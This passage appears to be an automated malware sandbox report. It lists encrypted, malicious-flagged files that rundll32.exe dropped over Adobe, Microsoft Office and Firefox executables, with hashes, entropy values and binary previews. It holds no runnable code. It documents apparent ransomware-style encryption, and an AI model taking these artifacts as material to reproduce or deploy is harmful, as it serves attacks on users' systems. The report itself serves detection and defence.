                                              Preview:]..'.6^...2.[..J .M...........L5.v$........D....r.......b...q...D.%..s.hu!.Z.L{......B...d.U{y.....6#...]E..|l.:6..'..=}.1....... qO./,.r.....s.P...n.....J..F. ......G..$y.3.m]...N\..+..5n#..Kin....Vk>J..E..O>[C.CD6..s.V.SW..[.&..aQ:|...n.uw..{g0)u..Pu.@...x.VK..JwV..%.l.Q.'.hd.!..-.G.L..D.M....-.~......+:/..As.........4...[....z....SDK....!...eX(N4b..@-Zm.B.......Hw._.UZu.WV...V^._.1..'v5..I1.u..<....d.......'.u.(...?..;...f..%..3..p.....O.=jP.._...,..$.Q.Y|/<.YI...|.,._.>V....X>2].W..)l-_o.si.zj^\.{.y0........Jn ...[..AF......ND8......}...O...o..V..+t.>.J#3G_.%.*.B.,..(:.-.H!..#}.b&.3.\......~j.#...r....Z.~.q...T..D^..S..x,\....0`.../d.......cM.?....T.v...ht...Y..T.K.H..(.......zi....a....O1bq....1.w..&.{..Y.`.&.g..&...G_..$......Y..\u.....4...k..I...%.i(...Fs.Y.....pf.......z.W0.J....]..9.. 9..l.....Q.F`.0.s.k..r..L..p.....(^.d..j.G..F.v^..X....^.7.|]..5R...........5......B....0..z..*5.u.7..........`,?.".B%..E.BsW*... ...9....s

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):531936
                                              Entropy (8bit):7.999674101069019
                                              Encrypted:true
                                              SSDEEP:12288:5nhgGQlkw/arzmk1vywVnZDoRGY18MJAGECUfi/GFS4Q6cDnOzxqj:thzYkLmuVJoRGTPFS4nVdS
                                              MD5:B9850544BBD555ABB26EDC2D2424E3CB
                                              SHA1:4CE33C7F6B8157B9AA10BDC1AD224E082560839C
                                              SHA-256:BD3B758CA8928C0BB8205CD2A1C7501E75B09BE0F3BFCA56ABC295244CC82794
                                              SHA-512:9F574153CFF2FE65928ADB918EDCDF4848BAC255F42CDEE115DC601197B79F78EF77E2FE2D5DA8CD413AB7949D15EF19A9C0E84B2B534AAA98EFE807B0C1A8DE
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........V.[N.... sg.".Z...........H.B...B..P.kIq..-......5&.[Ywlj..R.c...b.&...K.m.&vVxaIHb...u..o../M...h.R...m....|.R...=@l=5..y....O..........d....j.R.m.H..;T......f..\..4.v..p..8.s..(pfJ/...0H.8...:.._.....g. y..IN."...[,5..2.......$J"N...!r.o..X..4..3..k7o......Y....#..6......7...$.o...i..........k....vc.... .[7p...=!....:....../B.LW.bR]%.........<.p.$0.?~.v.y..ida...D.ZG%+....$|.....u.........j..o.|.e..A.....l...4.Z...8...wDf...J}.....']?............/4.....{...rF..u'.[W......Z~......>2...p<...Q@.U.+......-F..#......~....A.6.N....r.6.znmK..i.....N.&!.n...OE...b..tu/.d..G...8...X....y(...;.0.P...muF...1....Y&.c%8....F&..I..J.......z.<..n`....b1o..HU[..T..k.............L...sM:....L..$H..X..wk......7.(..,H...Y.Em.......(>.=/"~.Pd.#..H..j.hg/..3$/.gy=M:CP..Qt.h.J......i&>..%L...ZxJ......=.?.-;..>......2.....^B.......2.a.....9%....r.{..(.=.%...\w.........S.........DvG.....1......g..n@.-..Sv9./.o5.R

                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):643552
                                              Entropy (8bit):7.9997262073717135
                                              Encrypted:true
                                              SSDEEP:12288:PTffPI8tswMJTeOrAnwshq0xhZbrZkiTaDryrPCGaPj11Vi+pSPkDCnkvUA3H9Tp:PbHpsDJTePnwAxPbOgrsj10MDCjA99io
                                              MD5:04B52BC637E73AC33C35D3A75537EEB5
                                              SHA1:E9BFBE0C82C2449F9B6951EEB9DED03B97263CD9
                                              SHA-256:3B4D94105335D3859E934491C52056E15540CB4B3AA7373E20C96EFBA2A5BC8F
                                              SHA-512:C57F9A79133E1A7D39D3FD746BCE26F84F73997BBAA229BA93659858C0A36119716118A4CE465C6DC9BF51C6B166F95D92A5541269DC268D93E5785CA375A9A7
                                              Malicious:true
                                              Preview::.bu,..{..yN.'e.d............#;...Y......z.$.u)...J......J...V..r\g>8yA...D4m.._lb.x........>g.x...aL..wV...Zj .=.eL..K...,..P.Ah+.O~3.......6.6.[V.+..}.la.o.).....V.{..R.dL`....d.\`.+...G......)....j8.w...x..N,..:[..H=....7.u....s.r...3..16.c.H.3]..S.e%.u.&:......U/..$...u....%.l.Jm.T...j.Pk..w.P.f.t..JNW.T.W."$.dE.V|....F.7........^7..i)........K9a=|.o&........a;.dh.......j...Q...`$_..H...'..dF.8#l0\./......f...s....f..F..I]...4...^........o../..{...|.c..At.i.dGG.....n...&...Z....E..DS...)aV...;.0....o..7.|.J=....._t..U._..\..i..........n.Q.f.W....".l.s..[.Bf.(?.6w...-.}P..~L..u.%m.Q...qJ.`....u.U......%P....#$4x...}...i..^.......;.o6..V!.._.v.].....D...R.(.........~o..Ac...G..n..fJ.LD.p.<...)D>7....w.L8..../.......1h...ieQR...k@...A.z..]...R!d.D.....8H...Ob/9Np....o.&...@-.m.=..M{.xi........c...tYS.S$.=.$$M.j....J...z...........v..7..K.T.3(.....mf./EPt...s..;.W..l...e.e......>V.......%T.?./m...h....j_e....6D.....t....H....R...u.gq..

                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):267760
                                              Entropy (8bit):7.99935062418818
                                              Encrypted:true
                                              SSDEEP:6144:qtg8zj8ZYwTuJKMFSxXIoRcVq0rkAiW1/5MNd1A8:q7QPyKMFQ36VvMC/5+d7
                                              MD5:952064332989914BD42F258C485D790F
                                              SHA1:FA29D363541B40724799D752539FFE4EE792F6F1
                                              SHA-256:9B193FB5D124BA81CF5F53DEFAC3E39DA61D3A6705C958BAB5F069E0AAF2B447
                                              SHA-512:9B851C0C60DA6D15848CAAE30881161DA96C6D8FE071381BFF549A59F0450ADAD11F8B7A078390FBC58A139BE260C928110CE3D114CE9B2B1C5A7302D24D9590
                                              Malicious:true
                                              Preview:.S.N....dA............${V.K.k]..j .<6.G...XU'.....C.J.1<...5..Cf.7.a..=.e.@m....:!g........+.1.P.x....".|.t.t...sJ.x.$.Q.6|...,Ym".kf..S..^....3.O).,;..e...|6...z....r2...e.W~.....,..@..M......~...)q......qB.]C..TV.+0&...6fi......ge~..i.$.Dj2$.....i...r%......\-[.^....<.S..<F..u..,...]X.1...O%Z.3..Y'....4g.k.)...@C.eKq.s.p0&..,8.........@.......S;...8..u./T..P....m...[..gE.......M.pC......>....z....Eo. ..vkem...<..i..y..RxI6'.r..)..S....1......K..#h...E..M.0/.a....]....p...T..lQgI..+...{...O....G9..`. ..[..=...S...i...8..0C...Y.*.)..e.Q.hg.....(...z..@.P..b.qj....nIH..WJ.>._... ..A...Jj!.z........NM...7.#...:cj.u.6...J.l....=.C..oK..T.apV<<.P.@.....dt..>f.u\.L..R ...@.d.F.]...4,...j.6S.-W1...&.,...Iu.....D..=........n..........}W.uB...g...X:.Y....mT..n...TO..d.N.1%O....{....G......;...*Y...#4F....2....R....`....#.:...$;...Q.V)!..?...y...E....u..*4.zBF[C.U....Yx..`sX.....o.V.\.......9..).....m.l"....M+...|x....x...Q.R.:R.|.........i.

                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):49088
                                              Entropy (8bit):7.99659073773118
                                              Encrypted:true
                                              SSDEEP:768:5okcHr8gcPGYmuseVN/s4RtwIzxCtI18RilUNV9kCEoy1ZX+U8lFhY7NpSf8Buts:5QHr8gcPBmHk/lRtwINCt48Ril/cSw9O
                                              MD5:DDDB6DAFA9CEC6A01E5EFFFB24E36B14
                                              SHA1:4A7DA851B3016E9E5CB98A9586B20282039694E3
                                              SHA-256:5B74B7AA53B10548290A8A1450681558E37F38C871B2F5EBAC02B663B14F48A9
                                              SHA-512:26FF2D8CE4D015EE8AC8212ACF79A66C57107BBCE731CA5B28DF23053BD9692416C185C9385E9627F70601F1514455302FFF10E056AD47804BDE70031B21D34F
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.........slH.......C..r.E`......'.T4y...m.s6.Sd.7..G......7t1.q^.o..f|J.2.....F_B.........-..0o-..\..wl..l........I...=...^^...R.f...6.Z.7....`..S...7,W4....AvU.:..5.2..-...1I.6..G.../2S.....`....f....O..<....2..k...q.}G.....+.d..-.YY..K........hcon...u...#..&U@0.`'d.....B.5...\.?....c..w..s...r.......vA...B..a...1.G...2~ga`>...q..-.H....D..*f....`...]....T..U.]V..-.7....F......_._y4.^|c.l..7.!..dV...~.W5..=.....0r._q`zgm.^".2.......Xo.<l%\.l.......f...%6.:...*|. =aT...fU..[..s.e.%&.....gyr.....$....nV...d.k. /.....F.l.......`.{;.$....'....&...[..`M.O3c..JP..(J.)q..H.V.)...[d.bp.)^-s...k.z.+7H.......3.U...D..^.~5.....#..~.j.%..$..k[....d.._.z&..}S......:".V...A.~.3]....E.jW/...l.'1S..C..:.I..'.M2.a...:g...+m...r*...^......M.LG9.h.8..h...F...&hw.'...*.o..k".9P_.+&..U.4....Q.......<mLb./.o..z.S .9.^O...e.0rJ..=..S.|..&*.M...............)&.pd.l......E...5.......D.....5A!QQ.;..b3...(...{.#..7.M/<..

                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):195040
                                              Entropy (8bit):7.998959282176023
                                              Encrypted:true
                                              SSDEEP:3072:leVn2rwZtbMnlxTSWyxTWCR9X5G3WbyrNolc1lPV+e3L4UUWdwdwyAeL:leV20Zt4l5Xn3VjPse74u3yAeL
                                              MD5:9CC88D12808344F4626D4764AEEFB6BE
                                              SHA1:26A5BD07DC6EF8807D3611ECFDC909318A747F95
                                              SHA-256:4D13A4E22C1BFABB9367FB58B80BEBD6810424675C364DE33902600BD84F9BF9
                                              SHA-512:F417F61D508E992FFB61C31BAB9488247E2B7D03916527951CCF2304D8F8E362D4CC2578C9F0C11A80831BBE15AACA0350B22784EC73A53FE813BA3EED9BDF22
                                              Malicious:true
                                              Preview:..0.._....y..q...Z>.lc{.u.<.....\.s.MN..HU.j...m..vX.......b...m#........7%.........O.zG.$....).P=5w.b.A0...P...Ke.^.s......@..W....1d.n......4......l.o.]6..1.......?......>..I=....hy-.....~.`~........).).yK...d.go3..4.).*X.o8...[...A\.Y...C.o..?.....:.9|:......=....~.z!<...D.9.2.w...].......8.........&.H ........R....Z......1-..Y'..@6...pk7.,AL.....k....^q..I.._.....jF^.W...d.<...K>..k.>tj"hJ.......mwtyr.....H.......;>.lR........2.[%.......f.;.'K..]KR...P..&.n..........,...g...... ...3.K.....^[..e..q...........%..i...(......<.R.I.XY.......8..........j....Ma..q.nv.A.d..V........9..^C..-(..F.._p...'../^.qi$..R.U$.t.....p'.p.....`.z....]}L.....K.........}...@.=)A....E.|{.Pj.\.4|./6.l....:I.7.u**5 3....t..B.".G..=`.k......V..}.5.,&5....2.Y...U....B.F..X7.[....&..lnw.2/...wp5.]...r.......2X...E.. \5.O].S...l.F`,.`..k..oqf.Y(.......k..ww...O7..z8.G.zw.(.sI.:p..A....+.W.y.l.....>...7.c.....y.ko(..H@".!.f.y..%......%On7.=B*&.S...ZgU.i.\..UZ..

                                              C:\Program Files\Mozilla Firefox\crashreporter.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):259504
                                              Entropy (8bit):7.999347536244539
                                              Encrypted:true
                                              SSDEEP:6144:SL5y+mfdn5kAybbjpPHryoPAAeQ1S9Y0SSLGHzDaatXAyiRO+mA:SL5yFdO3pH2XQF0SSUzDptXA1O+mA
                                              MD5:D9290C403B27DBD99CAF40FD8FB95AF2
                                              SHA1:0FDD2F0D97D9AAE9E08D941F8FE785E7BFD593C8
                                              SHA-256:A935CAD30250EBE2B92E6B5E80314150A780D753FC4E02490527523B9D4E0E2F
                                              SHA-512:4C7AFABE0F48D0594A0FAD4876E90EDCE4EDA3910B94348C9A9ABFBE8C8D186960EEC53EB14E9261D331C2B51172542A888BBEFC0005DBDF57AA8BFF806613C0
                                              Malicious:true
                                              Preview:R.f...;.)..lG.....Q$+...s{..q.`<..m...P.T...>.._.... S."o$..H.[G...`.S)X.......r+/U!...!DTk...e.R.4....%2.P...o......:...%@.*TZ.c..8..a.@..N.L..[.?E-B..G...E.f v2..|.tn....u...@w.#\*..l=.hl..@..-1i.....1H..;.......$....~+zY....._.p..]..#....@:g.p%.8..1.B'..c......%~.{..Zy%Y.8.#$/..pA./BW..G].t.._..=S.9.H..\.`..].R.....F.5....W'Z.4..aq1..<....+.5..wO.m......,...*.X0.z....vR...P..vC..G7.......W.'.zk.R..z..(LU..$.ohb...7.;.g..D....C..:.a..j......X{#.g.G.6..t..Y....PFrk.>C.&...ZcD..g1...+.Q..]u..[..$V...D.9.8.*A....c.W..7...-......M...@...*.#.."/.~..\....V.hG#v.&Z...E..cZC$.m..b.nV...P....].....I!.W..\..5...7C.q..."....r..e... .#5^....S9..,UpD;.....(......|....-&..XMwi./i..|j.QH/.P....d....X.}..Q...St...T..3.......c2.[.]...D<aD.-....R_...&Q.j.......0.....L...~>..Kb~06.....j.@[..."@~..2A......".....-7..n.}.a.3nU.[]&....x......z......"....3.^..@....t...p....<.....<.l....+t..Y.r.c.7u..c..fn.Ac.a..%..v7.f....k..p$[l....ln..'u..{.....Z.Z(vp.....-....

                                              C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):717744
                                              Entropy (8bit):7.999753935648444
                                              Encrypted:true
                                              SSDEEP:12288:nSWPGlHf1w2szZaJ5LZ6WRg3l2N9+GnvBCtsFlCqhBmwcJxAYTNiENFtzZ/LoSxF:C/1MzCf6WK4NUGJOsPCqhbiAYTNDzZ/d
                                              MD5:2D80FCE72F7A7AFDB3F8BE9D72C20A78
                                              SHA1:8A64E09E0AE9380C761ADEA0FB91F3B31488ED77
                                              SHA-256:BA8BE507CEC301AD0F8668FD982B57912F857D5D79FD0AD7E7974AA73A5060FA
                                              SHA-512:74707F1E35D938DDDB8EBBBAD0C366F019559F463E967A1486A977255C083D70DCCD5E6163CD06BFDD2BDE07FB6D1E049BDEADE9F0AE27AD8E678959DAD6684E
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]....."d}.G]......J.....d-.->...P..Oy....9.T.5/....t.R.g...k.,k..p\p.! ..Z.a..h....+.....>K.j.5L..x0k.k+#.0..X...._.+]."9..H.;.o.EV...._W.N..n..T.3.|b=.|...p..|.~...........E..K.4.V.t.CC..pI".P.....f&&.......?".{$<..Q.n{./(..X.2/../..@0.i....................3..Z-.%..b..,x...X...^..!...5..jeY.u@7..&...'...8#G..D..t...*....L.v.Y.......p........#F.P.e`./..*..t.0r@.0$B.S6.0zY..I.vl.:...b.......}%.6@.O./.&......;...Tcz...(o.P.B$e.....\..(....ak...u.S.$c.+...g.".:D9B;./US;...p.W-.....m;[....m.J..Onb?.>-...FN.i.*0n.....0.r.glp...\...v....Uta.m.O.l..!]a...)<w.p.....I.P%@.?..).*.!NE.lx..`C..A.a....Zv.U.3...t..z.......Aur..V.o....9....=..+.......&8X.J..A[>..........{w..8.n.C....c...).....q3.[.z...I6....#..,...D..F\..~te\....]..I u.......gn...8.>X...........U@.2....9?..S.......ye.._.......8!./..j.xw....U.9..5..l.s..Xl-.

                                              C:\Program Files\Mozilla Firefox\firefox.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):676784
                                              Entropy (8bit):7.999774172959335
                                              Encrypted:true
                                              SSDEEP:12288:jdxlVuvZoavGbpE3GnpTjSwyhDotd4YikfZBPn+Cjcb1XIMcHd:xjVuWLpGGZjxwDotUIX+bxz2
                                              MD5:5657FC8E0B66515D8FCDFA4C9396670A
                                              SHA1:A2F8E50F3FA5E24AEAD77D67533CD58E3593942D
                                              SHA-256:BE79AFA216468B746AFBA09C193B6F4DDED40638CFA7F79F7993E8DF4FF7BD1F
                                              SHA-512:6BF5D06B318E6B878FE4187EE96626F5B08EDC71C6FD2A1D0EAD75D298F63AEBE8E23136B4D62CB2D543E8D68C975C853D94BF12C33FD16890C2997187A0EC3F
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]h...;2.7E.+...P.......w.,...?B.+...[M$..@P\..$.....E1...y.......%...o.<Y....1I.|}G.R..hrt..*...?;bh.#p.-.%V.4....2D....&..`.G..".>...t#p.&..h.!u.>..J..Np+#..D|N..`....).'....:.G..{S....nw.K....TB.(?z..psI...~J.6.h5......D.`...i..!O0....w....d..U.@*.l..CE..%.....0.5.._=>6..i..\Z.2..aD..._s.}.......E.|n.q.....m...d5b..G>.........@......^.@R>`......=1~....,.../.....2T?y..W.M.X....)&[..(..>.o.)...N<..C....\:...^'...Aw_Y.Y..i....G.....q.....HL.jJ(....0..>..3.tJ.0.L#s......S.k.......5...c....*.Vnx.....}....7.H....>t[ |[.*.3......V....m...#.2D3.0.Vo.,;Z.9....q\5.Z..Ly...N.X..Z.xR^1.[....w.y.,z.'B.G..].Zy.5..w...$}i.d.\..&.D...;.U.0.J ...WY.Q.2.2..n[.../.f.k._.D....Fd...On.....4.,...QwA.kPq6...t... e..oS. o.N.F.f&G .5].-.L~g...}..3A|Z.Q.>.}.X...sMr..X....u..C..~7.OU..J/.......P..I.C.n.C.....VP..Oge...~.....6..Q...e._..?.........@.;.s.......

                                              C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):239024
                                              Entropy (8bit):7.999292153280215
                                              Encrypted:true
                                              SSDEEP:6144:J5Uzdc021T9z5hcDnnqozZb2R7mjnyaB+TdIBE1SwHxM:AzyR0LqozZeoyaBmda2HK
                                              MD5:812101C2415185AB056FF94C0BCDADDB
                                              SHA1:83438DF06F70C178FF87643B147152D9AB654122
                                              SHA-256:8E9E3050947A41B08A6C4D9E893734DE5D77F5BDA5618F66266516E3D7B3C610
                                              SHA-512:39BD21E9074BF0D9C5192526048F49F574E6512CF381A93978278396AD6E890BBB8C93139D1388F23CC6A7DD841E34DB129478E09B63590C0B7D37D6CD97EB96
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]..K.T.R.....@..3.....KX}'R.E"e\..%C..*_..T5...R....k......9.1H../D[.1...>H.....So.p>}Mwk...y..~na...6.I.TnH.N.m........`......$..z....._? ..2F..V..._..w....P.._.!..B).0.3..u!q.w...4.?..2....x..^.MD.a`...X..\.\..!....0..\0S..j.m..,.i....5..8<u..d..9y...q.am8j...V0D..(I......;.q).oX.N..Ke.l`...=.]q..0l.t3.j.%u.....K..(<..a.j......W\..b..7t"$.\.t....k...`O..u$.....=.p.}.i. ...pD1......X...8z.|.S.-...c.ho.....t9$Duu...h3.....).J..p..H.....UV.y.D.g..{..f.....LO'.f..'[. ..`..6eN3GG.......s..7IB.........A......'..r.~w..'..BI.<.e..5.......u...5WL.....n...W.....M..Q...M~.N.......%P.g.......c.E.e..x.k.....t5;.>.S....-...F..lr.S.....\7.....X.a*.......".l...<e.m..LF(.qQe...A...k2'(Co'.e....$w....5..S..Q.t.1.i#...u..._qS.&q..L..DB;\P..dX\.R/.v...}...![*..W*...L...F.+..$D.U.......c..aU.?.h.s.7.e..c...Y.5...z.V.}d..J@.m..K!.......}.....CB.B6.:...t^L.nX.

                                              C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):188240
                                              Entropy (8bit):7.999103679178079
                                              Encrypted:true
                                              SSDEEP:3072:AmHXpBfP2KFCtKBTJ6cRgjTUOsUma25ghHbsCz0wB2kmDGgmoLXm0pYqBdBsG//y:AqXn2KVDRgjT/KBIzz0w5DoL20pTBd+L
                                              MD5:5C0162BDE811C6C07B81F66C5C03E475
                                              SHA1:178867B7B498E4402B3692D995E7A76F7F3F9FF2
                                              SHA-256:BA864D2B4F0EC85F34FCCE322D3AD7565E310660F8E8042DE92CA83F4CE4E9BC
                                              SHA-512:3B3553EBCDA7641D01C0F5D23F7F63F4D8BBC3D8F3B60B76E9C48F676DADAE0A693C6020BB7F0E3F6224C20217BD731C14903A8C4A9920720E6F6972DB0DFE45
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$...........(W.+.mn..^.._....>ho.....M1.Pb&.l...M..*pkr...8...Q.O.k..V..g.K.^m.....3..`"P9wY..tWQ...s..v ..%.3U..:.....+S....AP....U=..aoa..y..<.f..#[.....y..P.b..al"c..'..q.,...4.....#.\\.x.n.....]..v.H.....+...]'...v51.1....s..Q..@VS.....M...qY.[d.Y..C..yw^..K.h......0..!..........>...X..[......i...-.dY\qG..F.x.+yG.....h....9t..*(OY........G.@o..ET.... . X...2.P.2D5<....Z.\.t..p2....bb^......5>.......9K.X..3a.e.h.C.GWP.s..iy.o<..*i..R...Q6...h....+....g|..x...9.+,`.B..=....v.,..>kO.E!.L$.Hwu$...8....7w.G[.Cz.`..?.....|......pU..`.m..{.!....#B...@.........i63..7.{..Y.V.......Eo... .{a........d_..~.0.....1...L...f.3K\.........u... ..^.Q.....|.w..>&......J."M3.c..e.3#...../..f....l..3.".c...;..".'..4u...$....2.5.O....U.^..z..X....A..si..n.7....d..g......._hT........c^....-.z.f..C#..L..E...T.*.V...9...%I..\5.who.\|.r4=.^...*...0.......]OK...|.IOS.!.+.#'6=`l..._.u)L....%..5..M...T...*9O...O.1

                                              C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):773040
                                              Entropy (8bit):7.999785665129382
                                              Encrypted:true
                                              SSDEEP:12288:aGYoNaNjYl9kyRuKHgmnlAhfu7esXzVmYcugveEIUsQ4BwS6Ng01tQ6PM1aFy5dF:ajoUNO9kHU1niBuiRNsUsQ1S+1tQ601H
                                              MD5:A2CD357332882A76BB7BA1149D63274E
                                              SHA1:926D2DF7C206213E2483C176CFF8F52805D23B5B
                                              SHA-256:A13EFFF4BEE56C605CB5ABA96B21DB0836032AA3D767057A922ABDB4E23E926E
                                              SHA-512:6FBB302736F892F1A89A81B99C6341059F722C8867EBEBA913D8D0D42B8F1B6792124A31A91E30AD396D30AA44A5D7A0E5A1619CE1C41329C9C09E5E2BE43065
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]....."d}.G]....M..|..P..I....V...^6.l.....$.a.._..#q...V..=..e.....m.~..%b..r(.0._..1{.\u^........X.k.h..>tW....K5sX..:Z.....X.Rc.f.O..1.._H.a.~.......z*...........x.....9.s.........`u~.....[ky.O..|^...l..I.W>.....4i......t.......iC.......c...0.IL<.....9....@1H.F..t2..mt..cdl.dl.l9.H.W........yz.:...$.+...c.A..N.Z]..E........_f.7*H./..S....|..r....{.+...B....'..z......O.79...f.....t....y...er......RY9... .....4..c...^....>.......,.....LT....%..c.G.....:......K.f.p|....)...Ro@.].; ......,7(....K.{.a.."......YCXk>....].M..M........%.).O.t.F..#O>.h..,jE\..{......|.....ID.9...Uf........ae...u... ....n..G..Ow..&v....Z...%....O{2.Q. r.x..<u..s.A3.w......."<.4.....p.O.H_..!.1.......MT......_.<k.^.~x....(..q..a.......E.=.q......[.g.A......c..KZN$...~..f(.....`.FY....$+..tuY....rBY...o-j.D..B...=V...R..J%)0$Q.....)..9....q~XSR..BOPX_.o.

                                              C:\Program Files\Mozilla Firefox\pingsender.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):80816
                                              Entropy (8bit):7.9978255303817285
                                              Encrypted:true
                                              SSDEEP:1536:0XhCXV+FhgQrigzgkcm0wo2NP5C8fEXIMsBYhkXdwuPbcqyapd70y4VbCMB3t:0xCF+knm0wfPo8fQIfBYhkXdhl0fjt
                                              MD5:0B93C2D5458BFCAABFFFB78DB704C61D
                                              SHA1:2DC47AA69F54D633F8B17C84F46592503B26F10E
                                              SHA-256:6957A5CF6B80E68601EB7986781620516D29FACC579D3EFE437F6E98B167FC04
                                              SHA-512:B196DD447D9D13046575E998B3AA737F7E20FFA45F0CD772D9982729A4E07D2311B61AE1012284AC8BDC18CAA6D88E28FC39E0ABF465F16418F5A08343FA913C
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]....."d}.G]....M..|..P..I....V.....[...?.1:...C..X&..WS.,..T.....{...).k.."..{.........5".....4.N..3p.R...>...r..2.Z.G.0Yq.`K..we...ScA..2FV....NKvzT.....t..3??.z..[.U`!.N.fg.X...`.......N?-..Z..5^.3.M...t....5.q6zpY..T~..&J.Wf..t%.t.E.q..+..ED"&QY...",l.z...1.....i=\>.X.....6.....W..@.m..n..o4.f.y[...ope..(3......j.N.,C.....d~.d.}J....KU.(...l.....<.QB..1).U.~.3..^.....wq..t...fQ.8"Q*G@...j|;..W... A"@e..m...rw.L].....Dt........b....Sn.Hb9.y.":.wO........qVu... ./...9.f.e.....z6...}B.{,#kY......X....`~./U;b..d..F.jC........g......y...h.3.n.i3[Bu.x.,=....H4....FHb,...p..)dK.e&>S.*..%.*CU...X.&\..$8.Y.s.A..R...lb.Q.....N.j!w....V.).....VMy."....T...F._........<.{...5.B..?..^LeJ....t+"r.S...46.;s.D..8...y;...-..VF.wU.m.[.I....fW..E^&`;..+2......K.]H.....4.8.>.e...qc.....@...%..'.`..6....Q....w...;.<.C.@.S ..s3k...u ..E.........5

                                              C:\Program Files\Mozilla Firefox\plugin-container.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):289712
                                              Entropy (8bit):7.999430597515511
                                              Encrypted:true
                                              SSDEEP:6144:FescFCtcOcRRYP0LoViiAFuk0121hJGtR8un5mR59t:BOpRRE0LpluD2RORBwv
                                              MD5:E9268F6602005444598A2F4F4935A298
                                              SHA1:8CB3AF32419BB64B68292D6834826F8337C63BEB
                                              SHA-256:794CEEC35A783AF68EF45C61E47F5C8CBDFC598A10F54054AE0B98026869402C
                                              SHA-512:6984DE90CE39CC6F1684B7F8CA7087C8185F8023C80A75CC6A65DD9FEE68439ED8EB228444434EC68960D728919196A9D59CDB7B6146FFAE81ACDA418F3483FC
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]....."d}.G].............#..|...ZX^V~..c1U...Xeb.%gKy..L.`:..M~^.A.[.....c..)............../Wi.1;.i.g....t.f.K?p5...@....}..`.T.u.R..C..M..0.E.2..........N.....r,."}.5t.H.a..L....zH.Lt@...]Q|a.~<...-w}DLwi...*.Ei..6=..4..S...1/...a.b,|...v....1.t.n0h....%....6.... #.V6....6.R5..Qp.6..[...k.L..0...q.n...s..K.3...j.......;yN......n\.Zx......?..t.......\...G.R.:.....CaY...P<...6p.N.Lf>...{m2.55.V....N/.".!a...gd...H..5I.md.=).8]UCR.T.........P.xxm....]....yd...0.J......g...x.!y.x..UyR.......M..Xx!.$A~...q".-!t.Qt.x._.x../H..($..`....h........"#<.P.w..F'..D'#....W............1U....>Uv...5.h......YG( .].gL..A..N&.'}.0....D....md5.{. .D...*,...@.../Xa.]4/.7....}:~1P^.f.....7.Ac...!-........Z.....*!x....Jd.k/+W.|..r.J.q..M........V..[{....I..G..S.o..=.....v...*.i6..+...dr.%........y?..Y.o{.....]....e..92wa..e.Q......&G.O.H.L....j...R..5J.f..

                                              C:\Program Files\Mozilla Firefox\private_browsing.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65968
                                              Entropy (8bit):7.997516871196656
                                              Encrypted:true
                                              SSDEEP:1536:ouy6GmKRvN99UENx60/ctRnFwt/NJ6l4I6a4A+DUm:oX6J6vN993NG3F6u4ba4A+wm
                                              MD5:933CAEBDC32CAF222EA0703DB6C6D221
                                              SHA1:53E29DC7CCAE74DE268C157885604A822676A341
                                              SHA-256:63B5E28AFABEAA5DD327D51B6BA700906E31D9270592AA511A95B1C08EC3467B
